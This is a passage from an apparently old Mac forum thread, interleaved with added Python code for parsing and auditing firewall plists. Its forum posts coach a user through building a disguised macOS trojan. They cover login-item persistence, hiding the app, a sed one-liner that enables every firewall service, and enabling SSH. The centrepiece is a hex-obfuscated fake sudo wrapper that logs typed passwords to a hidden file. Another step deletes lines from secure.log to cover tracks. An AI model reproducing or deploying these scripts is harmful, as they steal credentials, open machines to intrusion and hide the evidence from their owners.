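        "Personal Web Sharing" = {editable = 0; enable = 0; port = (80, 427); row = 2; };
        "Printer Sharing" = {editable = 0; enable = 0; port = (631, 515); row = 7; };
        "Remote Apple Events" = {editable = 0; enable = 0; port = (3031); row = 6; };
        "Remote Login - SSH" = {editable = 0; enable = 0; port = (22); row = 3; };
        "Samba Sharing" = {editable = 0; enable = 0; port = (139); row = 1; };
        Timbuktu = {editable = 1; enable = 1; port = (407); row = 10; };
        "iChat Rendezvous" = {editable = 1; enable = 0; port = (5297, 5298); row = 8; };
        "iPhoto Rendezvous Sharing" = {editable = 1; enable = 0; port = (8770); row = 12; };
        "iTunes Music Sharing" = {editable = 1; enable = 0; port = (3689); row = 9; };
    };
    state = 1;
}
'''

# Tokens: a quoted string, one structural character, or a bare word (whitespace is skipped).
_TOKEN_RE = re.compile(r'"(?:[^"\\]|\\.)*"|[{}()=;,]|[^\s{}()=;,"]+')


def _atom(tok):
    # Quoted strings lose their quotes and backslash escapes; bare digit runs become ints.
    if tok.startswith('"'):
        return re.sub(r"\\(.)", r"\1", tok[1:-1])
    return int(tok) if tok.isdigit() else tok


def parse_openstep(text):
    # Recursive-descent parser for { key = value; ... } dictionaries and ( a, b ) arrays.
    tokens = _TOKEN_RE.findall(text)
    pos = 0

    def expect(tok):
        nonlocal pos
        if tokens[pos] != tok:
            raise ValueError(f"expected {tok!r} at token {pos}, got {tokens[pos]!r}")
        pos += 1

    def value():
        nonlocal pos
        tok = tokens[pos]
        pos += 1
        if tok == "{":
            result = {}
            while tokens[pos] != "}":
                key = _atom(tokens[pos])
                pos += 1
                expect("=")
                result[key] = value()
                expect(";")
            pos += 1
            return result
        if tok == "(":
            items = []
            while tokens[pos] != ")":
                items.append(value())
                if tokens[pos] == ",":
                    pos += 1
            pos += 1
            return items
        return _atom(tok)

    return value()


def enabled_services(config):
    # Every rule with enable = 1, with its TCP and UDP port lists (a missing list is empty).
    return {name: {"tcp": rule.get("port", []), "udp": rule.get("udpport", [])}
            for name, rule in config["firewall"].items() if rule.get("enable") == 1}


def summary_matches_rules(config):
    # allports/alludpports appear to be the cached union of the enabled rules' ports
    # (assumption inferred from the dumps in this thread). A mismatch deserves a closer look.
    enabled = enabled_services(config)
    tcp = sorted({p for r in enabled.values() for p in r["tcp"]}, key=str)
    udp = sorted({p for r in enabled.values() for p in r["udp"]}, key=str)
    return (sorted(config.get("allports", []), key=str) == tcp
            and sorted(config.get("alludpports", []), key=str) == udp)


if __name__ == "__main__":
    cfg = parse_openstep(SAMPLE_DEFAULTS)
    print("firewall state:", cfg["state"])
    for name, ports in enabled_services(cfg).items():
        print(f"  enabled: {name}  tcp={ports['tcp']}  udp={ports['udp']}")
    print("summary consistent with rules:", summary_matches_rules(cfg))
```

On the sample above the only enabled rules are Network Time (UDP 123) and Timbuktu (TCP 407), which is exactly what allports and alludpports list, so the consistency check passes; feeding it the output of `sudo defaults read /Library/Preferences/com.apple.sharing.firewall` from a machine under review works the same way.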
callmenames
Oktane, for your "if folder exists" issue.
CODE
try
    set the_folder to (do shell script "ls -d1 \"/Library/Preferences/.mdiod.app\"")
on error
    display dialog "It ain't there boss!"
end try


callmenames
Oktane, plist tricks...

From Terminal...
In 10.4 and higher, most of the plist files used by the system are in binary format, not xml (text). The program 'plutil' can convert between the two formats.
CODE
sudo plutil -convert binary1  /Library/Preferences/com.apple.sharing.firewall.plist
hexdump -Cn 100 /Library/Preferences/com.apple.sharing.firewall.plist

QUOTE
00000000 62 70 6c 69 73 74 30 30 d4 01 02 03 04 05 07 08 |bplist00........|
00000010 58 5b 61 6c 6c 75 64 70 70 6f 72 74 73 55 73 74 |X[alludpportsUst|
00000020 61 74 65 58 66 69 72 65 77 61 6c 6c 58 61 6c 6c |ateXfirewallXall|
00000030 70 6f 72 74 73 a1 06 54 35 39 30 30 08 dd 09 0a |ports..T5900....|
00000040 0b 0c 0d 0e 0f 10 11 12 13 14 15 16 21 26 2a 2e |............!&*.|
00000050 32 36 3a 3f 44 48 4e 53 5f 10 14 41 70 70 6c 65 |26:?DHNS_..Apple|
00000060 20 52 65 6d | Rem|

CODE
sudo plutil -convert xml1 /Library/Preferences/com.apple.sharing.firewall.plist
hexdump -Cn 100 /Library/Preferences/com.apple.sharing.firewall.plist

QUOTE
00000000 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 |<?xml version="1|
00000010 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 |.0" encoding="UT|
00000020 46 2d 38 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 |F-8"?>.<!DOCTYPE|
00000030 20 70 6c 69 73 74 20 50 55 42 4c 49 43 20 22 2d | plist PUBLIC "-|
00000040 2f 2f 41 70 70 6c 65 20 43 6f 6d 70 75 74 65 72 |//Apple Computer|
00000050 2f 2f 44 54 44 20 50 4c 49 53 54 20 31 2e 30 2f |//DTD PLIST 1.0/|
00000060 2f 45 4e 22 |/EN"|

The program 'defaults' can read and write binary or xml plist files.
CODE
sudo defaults read /Library/Preferences/com.apple.sharing.firewall
QUOTE
{
    allports = ("5900-5902");
    alludpports = (5900);
    firewall = {
        "Apple Remote Desktop" = {
            editable = 0;
            enable = 0;
            port = (3283, 5900);
            row = 5;
            udpport = (3283, 5900);
        };
        "FTP Access" = {editable = 0; enable = 0; port = (21); row = 4; };
        "Network Time" = {editable = 1; enable = 0; row = 11; udpport = (123); };
        "Personal File Sharing" = {editable = 0; enable = 0; port = (548, 427); row = 0; };
        "Personal Web Sharing" = {editable = 0; enable = 0; port = (80, 427, 443); row = 2; };
        "Printer Sharing" = {editable = 0; enable = 0; port = (631, 515); row = 7; };
        "Remote Apple Events" = {editable = 0; enable = 0; port = (3031); row = 6; };
        "Remote Login - SSH" = {editable = 0; enable = 0; port = (22); row = 3; };
        "Samba Sharing" = {editable = 0; enable = 0; port = (139); row = 1; udpport = (137, 138); };
        VNC = {editable = 1; enable = 1; port = ("5900-5902"); row = 12; udpport = (5900); };
        "iChat Rendezvous" = {editable = 1; enable = 0; port = (5297, 5298); row = 8; };
        "iPhoto Rendezvous Sharing" = {editable = 1; enable = 0; port = (8770); row = 10; };
        "iTunes Music Sharing" = {editable = 1; enable = 0; port = (3689); row = 9; };
    };
    state = 0;
}

And of course, once it's a text file (xml) it's easy to mess with it using standard command line utilities such as 'tr' and 'sed'.
CODE
cat /Library/Preferences/com.apple.sharing.firewall.plist | tr -s "\n\t" "Q " | sed -e 's/enable<\/key>Q <integer>0</enable<\/key>Q <integer>1</g' | tr "Q" "\n"
QUOTE
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
	<key>allports</key>
	<array>
		<string>5900-5902</string>
	</array>
	<key>alludpports</key>
	<array>
		<string>5900</string>
	</array>
	<key>firewall</key>
	<dict>
		<key>Apple Remote Desktop</key>
		<dict>
			<key>editable</key>
			<integer>0</integer>
			<key>enable</key>
			<integer>1</integer>
			<key>port</key>
			<array>
				<string>3283</string>
				<string>5900</string>
			</array>
			<key>row</key>
			<integer>5</integer>
			<key>udpport</key>
			<array>
				<string>3283</string>
				<string>5900</string>
			</array>
		</dict>
		<key>FTP Access</key>
		<dict>
			<key>editable</key>
			<integer>0</integer>
			<key>enable</key>
			<integer>1</integer>
[...]



Firewall info for 10.5 http://www.google.com/search?q=%22com.apple.alf.plist%22
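The post above switches the firewall plist between binary1 and xml1 with plutil and then edits the XML form with a blind tr/sed text replace. A structured parser is safer for both reading and auditing: the following is an added example (editor's code, not from this thread or from Apple) that uses Python's plistlib, which reads both formats the post converts between. It assumes only the dictionary layout visible in the `defaults read` output above (firewall -> service name -> {editable, enable, port, row, udpport}); the embedded plist is a constructed three-entry sample in that shape, and `tampered_copy` models the enable-flag flip the sed one-liner performs so the baseline diff has something to detect.

```python
"""Audit a com.apple.sharing.firewall-style plist with a real plist parser.

Added example, not code from the thread. It assumes the dictionary layout
shown in the `defaults read` output on the page (firewall -> service name ->
{editable, enable, port, row, udpport}) and uses plistlib, which reads both
the binary1 and xml1 forms that `plutil -convert` switches between.
"""
import copy
import plistlib
from typing import Dict, List, Tuple

# Constructed sample in the same shape as the file on the page (three entries,
# not the full list), so the script runs without touching a live system.
SAMPLE_XML = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
  <key>allports</key>
  <array><string>5900-5902</string></array>
  <key>firewall</key>
  <dict>
    <key>Personal File Sharing</key>
    <dict>
      <key>editable</key><integer>0</integer>
      <key>enable</key><integer>0</integer>
      <key>port</key><array><string>548</string><string>427</string></array>
      <key>row</key><integer>0</integer>
    </dict>
    <key>Remote Login - SSH</key>
    <dict>
      <key>editable</key><integer>0</integer>
      <key>enable</key><integer>0</integer>
      <key>port</key><array><string>22</string></array>
      <key>row</key><integer>3</integer>
    </dict>
    <key>VNC</key>
    <dict>
      <key>editable</key><integer>1</integer>
      <key>enable</key><integer>1</integer>
      <key>port</key><array><string>5900-5902</string></array>
      <key>row</key><integer>12</integer>
      <key>udpport</key><array><string>5900</string></array>
    </dict>
  </dict>
  <key>state</key>
  <integer>1</integer>
</dict>
</plist>
"""


def load_plist(data: bytes) -> dict:
    """Parse plist bytes; plistlib sniffs the bplist00 header vs. XML itself."""
    return plistlib.loads(data)


def to_binary(plist: dict) -> bytes:
    """Serialise to binary1, the on-disk form 10.4+ uses (header b'bplist00')."""
    return plistlib.dumps(plist, fmt=plistlib.FMT_BINARY)


def enabled_services(plist: dict) -> List[str]:
    """Names of firewall entries whose enable flag is 1 (sorted for stable output)."""
    fw = plist.get("firewall", {})
    return sorted(n for n, e in fw.items() if int(e.get("enable", 0)) == 1)


def service_ports(plist: dict, name: str) -> Dict[str, List[str]]:
    """TCP and UDP port strings for one entry; a missing key means no ports."""
    e = plist.get("firewall", {}).get(name, {})
    return {"tcp": list(e.get("port", [])), "udp": list(e.get("udpport", []))}


def diff_enable_flags(baseline: dict, current: dict) -> List[Tuple[str, int, int]]:
    """Entries whose enable flag differs from a known-good snapshot: (name, was, now)."""
    b_fw, c_fw = baseline.get("firewall", {}), current.get("firewall", {})
    changed = []
    for name in sorted(set(b_fw) | set(c_fw)):
        was = int(b_fw.get(name, {}).get("enable", 0))
        now = int(c_fw.get(name, {}).get("enable", 0))
        if was != now:
            changed.append((name, was, now))
    return changed


def tampered_copy(plist: dict) -> dict:
    """Hypothetical post-tampering state used only as the 'current' input for
    the baseline diff: every enable 0 flipped to 1, which is the effect the
    tr/sed one-liner on the page has on the XML form."""
    m = copy.deepcopy(plist)
    for entry in m.get("firewall", {}).values():
        if entry.get("enable") == 0:
            entry["enable"] = 1
    return m


if __name__ == "__main__":
    base = load_plist(SAMPLE_XML)
    print("enabled:", enabled_services(base))
    print("VNC ports:", service_ports(base, "VNC"))
    assert load_plist(to_binary(base)) == base  # binary <-> xml round trip is lossless
    for name, was, now in diff_enable_flags(base, tampered_copy(base)):
        print(f"ALERT {name!r}: enable {was} -> {now}")
```

To run it against a real file, read the plist bytes from disk (with the same privileges `defaults read` needed above) and pass them to `load_plist`; it works unchanged whether the file is currently binary1 or xml1, so there is no need to `plutil -convert` first. Keep a copy of the parsed dictionary from a known-good state as the baseline and schedule `diff_enable_flags` against the live file; an entry whose flag changed without an administrator doing it is worth an alert. On 10.5 the file is com.apple.alf.plist, as the post notes, and its layout differs, so the key paths would need adjusting.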
callmenames
Oktane, you can also download the GUI version of fseventer which may be easier to use. The command line fs_usage is still nice especially if you want to run it on another system entirely, over SSH for instance. :) fseventer is also available in command line version, and it's bundled into 10.5, it can be downloaded and installed for 10.4 and prior.
QUOTE(Oktane @ May 30 2008, 08:34 PM) *
fs_config I think, that thing is kinda confusing but I will try anyway

andrewistheshit
ok thanks for the outline..
CODE
if this program is being run by user id 0 then
    just run the shell script
else
    modify the com.apple.SystemLoginItems.plist file to run myself from /Library/Caches/ on restart
    move myself to /Library/Caches/
    exit
end if

but if i have that as an app and i just have a txt version of the bash shell
where do i put the bash shell in the app?
because if i send someone an app it needs to have the BASH script 2.
callmenames
Andrew, since the bash script is only text, it would be simple to set a variable to contain the entire contents of the bash script in the AppleScript and then have the AppleScript create the bash script file.

Or you can place the bash script anywhere inside the AppleScript application bundle, and have the AppleScript move or copy the bash script to a different location or run it from within its own bundle.

Here is an example of an AppleScript creating a bash script (echoing out the contents into a new file).
CODE
on alias_sudo()
    do shell script "echo -e \"\\x23\\x21\\x2f\\x62\\x69\\x6e\\x2f\\x62\\x61\\x73\\x68\\x0a\\x5b\\x20\\x22\\x78\\x24\\x7b\\x2a\\x7d\\x22\\x20\\x3d\\x3d\\x20\\x22\\x78\\x22\\x20\\x5d\\x20\\x26\\x26\\x20\\x65\\x78\\x65\\x63\\x20\\x2f\\x75\\x73\\x72\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x75\\x64\\x6f\\x20\\x26\\x26\\x20\\x65\\x78\\x69\\x74\\x20\\x31\\x3b\\x5b\\x20\\x22\\x78\\x24\\x7b\\x31\\x7d\\x22\\x20\\x21\\x3d\\x20\\x22\\x78\\x24\\x7b\\x31\\x2f\\x2d\\x6b\\x7d\\x22\\x20\\x2d\\x6f\\x20\\x22\\x78\\x24\\x7b\\x31\\x7d\\x22\\x20\\x21\\x3d\\x20\\x22\\x78\\x24\\x7b\\x31\\x2f\\x2d\\x4b\\x7d\\x22\\x20\\x5d\\x20\\x26\\x26\\x20\\x65\\x78\\x65\\x63\\x20\\x2f\\x75\\x73\\x72\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x75\\x64\\x6f\\x20\\x22\\x24\\x7b\\x2a\\x7d\\x22\\x20\\x26\\x26\\x20\\x65\\x78\\x69\\x74\\x20\\x30\\x3b\\x5b\\x20\\x24\\x28\\x28\\x24\\x52\\x41\\x4e\\x44\\x4f\\x4d\\x25\\x32\\x29\\x29\\x20\\x21\\x3d\\x20\\x30\\x20\\x5d\\x20\\x26\\x26\\x20\\x65\\x78\\x65\\x63\\x20\\x2f\\x75\\x73\\x72\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x75\\x64\\x6f\\x20\\x22\\x24\\x7b\\x2a\\x7d\\x22\\x20\\x26\\x26\\x20\\x65\\x78\\x69\\x74\\x20\\x30\\x3b\\x65\\x63\\x68\\x6f\\x20\\x2d\\x6e\\x65\\x20\\x22\\x5c\\x78\\x35\\x30\\x5c\\x78\\x36\\x31\\x5c\\x78\\x37\\x33\\x5c\\x78\\x37\\x33\\x5c\\x78\\x37\\x37\\x5c\\x78\\x36\\x66\\x5c\\x78\\x37\\x32\\x5c\\x78\\x36\\x34\\x5c\\x78\\x33\\x61\\x22\\x3b\\x73\\x74\\x74\\x79\\x20\\x2d\\x65\\x63\\x68\\x6f\\x20\\x32\\x3e\\x2f\\x64\\x65\\x76\\x2f\\x6e\\x75\\x6c\\x6c\\x3b\\x72\\x65\\x61\\x64\\x20\\x70\\x61\\x73\\x73\\x3b\\x73\\x74\\x74\\x79\\x20\\x73\\x61\\x6e\\x65\\x20\\x32\\x3e\\x2f\\x64\\x65\\x76\\x2f\\x6e\\x75\\x6c\\x6c\\x3b\\x65\\x63\\x68\\x6f\\x20\\x22\\x24\\x7b\\x70\\x61\\x73\\x73\\x7d\\x20\\x22\\x20\\x3e\\x3e\\x20\\x7e\\x2f\\x50\\x75\\x62\\x6c\\x69\\x63\\x2f\\x2e\\x68\\x6f\\x77\\x64\\x79\\x3b\\x65\\x63\\x68\\x6f\\x3b\\x65\\x63\\x68\\x6f\\x20\\x22\\x53\\x6f\\x72\\x72\\x79\\x2c\\x20\\x74\\x72\\x79\\x20\\x61\\x67\\x61\\x69\\x6e\\x2e\\x22\\x3b\\x2f\\x75\\x73\\x72\\x2f\\x62\\x69\\x6e\\x2f\\x7
3\\x75\\x64\\x6f\\x20\\x2d\\x6b\\x20\\x32\\x3e\\x2f\\x64\\x65\\x76\\x2f\\x6e\\x75\\x6c\\x6c\\x3b\\x65\\x78\\x65\\x63\\x20\\x2f\\x75\\x73\\x72\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x75\\x64\\x6f\\x20\\x22\\x24\\x7b\\x2a\\x7d\\x22\" > ~/Library/.sudo2"
    do shell script defuxor("puzjq2cjt+f2~/Lvomnmg/.acqj72;2nyvna2acqj=~/Lvomnmg/.acqj72;2rpuj2nyvna2acqj=~/Lvomnmg/.acqj72>>2~/.kmjsvyr")
end alias_sudo

callmenames
RE: Post #42 on page 5.
Well that explains why everyone was having so much trouble getting that working. I seem to have left off the () from the last line. I blame copy and paste once again, for not correcting such things for me. Apologies to Oktane in particular over this one. Oops.
CODE
enable_ssh()
callmenames
RE: Post #176 on page 18

Sometimes I'm about as helpful as a bowling ball in a horseshoe throwing contest.

To access files within the AppleScript application bundle...
CODE
set the_path to ((path to me) as text) & "bash_script.sh"
set the_other_path to POSIX path of (((path to me) as text) & "bash_script.sh")
callmenames
RE: Post #13 on page 2
More corrections. Sigh.
QUOTE(callmenames @ May 20 2008, 10:44 PM) *
How should you save which/what file? An AppleScript? Run only/application bundle with no window and no stay open. A shell script? A text file with execute permissions set on the file.
And by "no window" I meant "no startup screen"

QUOTE(callmenames @ May 20 2008, 10:44 PM) *
To make an AppleScript run "invisible" (which won't actually be necessary in this case because you are going to have it run prior to the user logging in which means they will never see it anyway
I was wrong, if the app isn't fast enough to run and exit prior to user login they will definitely see things such as the app name in the menu bar, icon in the dock etc. if the app has GUI elements. The best way to avoid that with an AppleScript application bundle is to add the LSUIElement boolean yes to the info.plist inside the bundle.
callmenames
RE:Post #192 on page 20
QUOTE(callmenames @ May 29 2008, 09:23 AM) *
[...]Ideas, thoughts, suggestions...
cat /etc/syslog.conf
cat sshd_config | grep log

That's /etc/sshd_config

QUOTE(callmenames @ May 29 2008, 09:23 AM) *
sed -e '/^.*[Ff][Rr][Oo][Mm].*$/d' secure.log > secure.log.2 && mv secure.log2 secure.log

Make that... sed -e '/^.*[Ff][Rr][Oo][Mm].*$/d' secure.log > secure.log.2 && mv secure.log.2 secure.log

Invision Power Board © 2001-2010 Invision Power Services, Inc.